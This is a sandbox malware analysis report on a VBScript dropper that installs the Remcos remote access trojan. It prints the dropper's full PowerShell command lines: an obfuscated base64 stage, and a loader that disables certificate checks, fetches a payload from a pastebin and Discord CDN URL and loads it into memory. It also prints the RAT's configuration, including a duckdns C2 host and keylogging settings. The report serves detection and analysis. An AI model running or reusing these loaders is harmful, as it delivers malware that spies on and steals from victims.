Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
envifa.vbs

Overview

General Information

Sample name:envifa.vbs
Analysis ID:1470985
MD5:d7b8dbc995cd2e2d12eac713f4a422b3
SHA1:90f85e9d199fcb8362358e416125a69e9bdbacd3
SHA256:8c3b345a4476aaa0e7adbe1dff93abdaf70b6740f4d72c5f74f9bc2e3435feb9
Tags:vbs
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected MSILDownloaderGeneric
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6608 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\envifa.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6740 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0 G8 YwBv Gw V B5 H ZQBd Do OgBU Gw cw x DI OwBb EI eQB0 GU WwBd F0 I k Ho Z Bt Hc a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K g Cg TgBl Hc LQBP GI agBl GM d g E4 ZQB0 C4 VwBl GI QwBs Gk ZQBu HQ KQ u EQ bwB3 G4 b Bv GE Z BT HQ cgBp G4 Zw o Cc a B0 HQ c 6 C8 LwBw GE cwB0 GU YgBp G4 LgBj G8 bQ v HI YQB3 C8 Vg 5 Hk NQBR DU dgB2 Cc KQ g Ck I p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J B6 GQ bQB3 Gg KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DM LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc TQBz HE QgBJ GI WQ n Ck LgBJ G4 dgBv Gs ZQ o CQ bgB1 Gw b s C WwBv GI agBl GM d Bb F0 XQ g Cg Jw m DY O w GQ MQ 4 GU N Bm DM YgBm DY N 1 DY Yw x DM NgBh Dk M Bk DM MQ w GQ O 3 DE MgBh Dg NQBj DU O Bh DM OQ 5 DU Zg x GE Z 2 GI OQBj Dk MQ 1 DY Nw w GQ NgBk GE Yg x GE PQBt Gg JgBm Dg MQ 4 GQ O 2 DY PQBz Gk JgBm D MwBk GU O 2 DY PQB4 GU PwB0 Hg d u Dc Lg 5 Gk dgBu GU Lw 4 DM N 1 DQ Mg 2 DY MQ 2 DQ O x D Mw w DY Mg x C8 MQ 2 DI N x Dc OQ w DY Mg z DI Nw z DM NQ x DI MQ v HM d Bu GU bQBo GM YQB0 HQ YQ v G0 bwBj C4 c Bw GE Z By G8 YwBz Gk Z u G4 Z Bj C8 Lw 6 HM c B0 HQ a n C L g CQ bQBo HM ZgBv C L g Cc XwBf F8 XwBf GQ ZwBm F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 Jw s C J Bs H cgBr Gw L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\envifa.vbs');powershell -command $KByHL; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$lprkl = '0';$mhsfo = 'C:\Users\user\Desktop\envifa.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $zdmwh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($zdmwh).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&680d18e4f3bf6456c136a90d310d8712a85c58a3995f1ad6b9c915670d6dab1a=mh&f818d866=si&f03de866=xe?txt.7.9ivne/8345426616481030621/1624179062327335121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $mhsfo , '_____dgf_______________________________________-------', $lprkl, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegSvcs.exe (PID: 6736 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "remcoss2024feb.duckdns.org:4576:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-LD53L6", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.3015953762.0000000002E0F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.3014847261.00000000011A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000003.00000002.1839358905.0000021A1EAEF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000003.00000002.1839358905.0000021A1EAEF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000003.00000002.1839358905.0000021A1EAEF000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6b188:$a1: Remcos restarted by watchdog!
            • 0x8c7c0:$a1: Remcos restarted by watchdog!
            • 0x6b700:$a3: %02i:%02i:%02i:%03i
            • 0x8cd38:$a3: %02i:%02i:%02i:%03i
            Click to see the 15 entries
            SourceRuleDescriptionAuthorStrings
            3.2.powershell.exe.21a0ef5f991.4.raw.unpackINDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URLDetects executables (downloaders) containing reversed URLs to raw contents of a pasteditekSHen
            • 0x11e02:$u1: /moc.nibetsap//:sptth
            3.2.powershell.exe.21a0ef62350.2.raw.unpackINDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URLDetects executables (downloaders) containing reversed URLs to raw contents of a pasteditekSHen
            • 0xf443:$u1: /moc.nibetsap//:sptth
            4.2.RegSvcs.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              4.2.RegSvcs.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                4.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6aaa8:$a1: Remcos restarted by watchdog!
                • 0x6b020:$a3: %02i:%02i:%02i:%03i
                Click to see the 17 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0 G8 YwBv Gw V B5 H ZQBd Do OgBU Gw cw x DI OwBb EI eQB0 GU WwBd F0 I k Ho Z Bt Hc a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K g Cg TgBl Hc LQBP GI agBl GM d g E4 ZQB0 C4 VwBl GI QwBs Gk ZQBu HQ KQ u EQ bwB3 G4 b Bv GE Z BT HQ cgBp G4 Zw o Cc a B0 HQ c 6 C8 LwBw GE cwB0 GU YgBp G4 LgBj G8 bQ v HI YQB3 C8 Vg 5 Hk NQBR DU dgB2 Cc KQ g Ck I p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J B6 GQ bQB3 Gg KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DM LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc TQBz HE QgBJ GI WQ n Ck LgBJ G4 dgBv Gs ZQ o CQ bgB1 Gw b s C WwBv GI agBl GM d Bb F0 XQ g Cg Jw m DY O w GQ MQ 4 GU N Bm DM YgBm DY N 1 DY Yw x DM NgBh Dk M Bk DM MQ w GQ O 3 DE MgBh Dg NQBj DU O Bh DM OQ 5 DU Zg x GE Z 2 GI OQBj Dk MQ 1 DY Nw w GQ NgBk GE Yg x GE PQBt Gg JgBm Dg MQ 4 GQ O 2 DY PQBz Gk JgBm D MwBk GU O 2 DY PQB4 GU PwB0 Hg d u Dc Lg 5 Gk dgBu GU Lw 4 DM N 1 DQ Mg 2 DY MQ 2 DQ O x D Mw w DY Mg x C8 MQ 2 DI N x Dc OQ w DY Mg z DI Nw z DM NQ x DI MQ v HM d Bu GU bQBo GM YQB0 HQ YQ v G0 bwBj C4 c Bw GE Z By G8 YwBz Gk Z u G4 Z Bj C8 Lw 6 HM c B0 HQ a n C L g CQ bQBo HM ZgBv C L g Cc XwBf F8 XwBf GQ ZwBm F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 Jw s C J Bs H cgBr Gw L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\envifa.vbs');powershell -command $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$lprkl = '0';$mhsfo = 'C:\Users\user\Desktop\envifa.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $zdmwh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($zdmwh).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&680d18e4f3bf6456c136a90d310d8712a85c58a3995f1ad6b9c915670d6dab1a=mh&f818d866=si&f03de866=xe?txt.7.9ivne/8345426616481030621/1624179062327335121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $mhsfo , '_____dgf_______________________________________-------', $lprkl, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$lprkl = '0';$mhsfo = 'C:\Users\user\Desktop\envifa.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $zdmwh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($zdmwh).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&680d18e4f3bf6456c136a90d310d8712a85c58a3995f1ad6b9c915670d6dab1a=mh&f818d866=si&f03de866=xe?txt.7.9ivne/8345426616481030621/1624179062327335121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $mhsfo , '_____dgf_______________________________________-------', $lprkl, '1', 'Roda' ));", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0 G8 YwBv Gw V B5 H ZQBd Do OgBU Gw cw x DI OwBb EI eQB0 GU WwBd F0 I k Ho Z Bt Hc a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K g Cg TgBl Hc LQBP GI agBl GM d
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0 G8 YwBv Gw V B5 H ZQBd Do OgBU Gw cw x DI OwBb EI eQB0 GU WwBd F0 I k Ho Z Bt Hc a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K g Cg TgBl Hc LQBP GI agBl GM d g E4 ZQB0 C4 VwBl GI QwBs Gk ZQBu HQ KQ u EQ bwB3 G4 b Bv GE Z BT HQ cgBp G4 Zw o Cc a B0 HQ c 6 C8 LwBw GE cwB0 GU YgBp G4 LgBj G8 bQ v HI YQB3 C8 Vg 5 Hk NQBR DU dgB2 Cc KQ g Ck I p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J B6 GQ bQB3 Gg KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DM LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc TQBz HE QgBJ GI WQ n Ck LgBJ G4 dgBv Gs ZQ o CQ bgB1 Gw b s C WwBv GI agBl GM d Bb F0 XQ g Cg Jw m DY O w GQ MQ 4 GU N Bm DM YgBm DY N 1 DY Yw x DM NgBh Dk M Bk DM MQ w GQ O 3 DE MgBh Dg NQBj DU O Bh DM OQ 5 DU Zg x GE Z 2 GI OQBj Dk MQ 1 DY Nw w GQ NgBk GE Yg x GE PQBt Gg JgBm Dg MQ 4 GQ O 2 DY PQBz Gk JgBm D MwBk GU O 2 DY PQB4 GU PwB0 Hg d u Dc Lg 5 Gk dgBu GU Lw 4 DM N 1 DQ Mg 2 DY MQ 2 DQ O x D Mw w DY Mg x C8 MQ 2 DI N x Dc OQ w DY Mg z DI Nw z DM NQ x DI MQ v HM d Bu GU bQBo GM YQB0 HQ YQ v G0 bwBj C4 c Bw GE Z By G8 YwBz Gk Z u G4 Z Bj C8 Lw 6 HM c B0 HQ a n C L g CQ bQBo HM ZgBv C L g Cc XwBf F8 XwBf GQ ZwBm F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 Jw s C J Bs H cgBr Gw L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\envifa.vbs');powershell -command $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\envifa.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\envifa.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\envifa.vbs", ProcessId: 6608, ProcessName: wscript.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$lprkl = '0';$mhsfo = 'C:\Users\user\Desktop\envifa.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $zdmwh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($zdmwh).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&680d18e4f3bf6456c136a90d310d8712a85c58a3995f1ad6b9c915670d6dab1a=mh&f818d866=si&f03de866=xe?txt.7.9ivne/8345426616481030621/1624179062327335121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $mhsfo , '_____dgf_______________________________________-------', $lprkl, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$lprkl = '0';$mhsfo = 'C:\Users\user\Desktop\envifa.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $zdmwh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($zdmwh).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&680d18e4f3bf6456c136a90d310d8712a85c58a3995f1ad6b9c915670d6dab1a=mh&f818d866=si&f03de866=xe?txt.7.9ivne/8345426616481030621/1624179062327335121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $mhsfo , '_____dgf_______________________________________-------', $lprkl, '1', 'Roda' ));", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0 G8 YwBv Gw V B5 H ZQBd Do OgBU Gw cw x DI OwBb EI eQB0 GU WwBd F0 I k Ho Z Bt Hc a g D0 I Bb HM 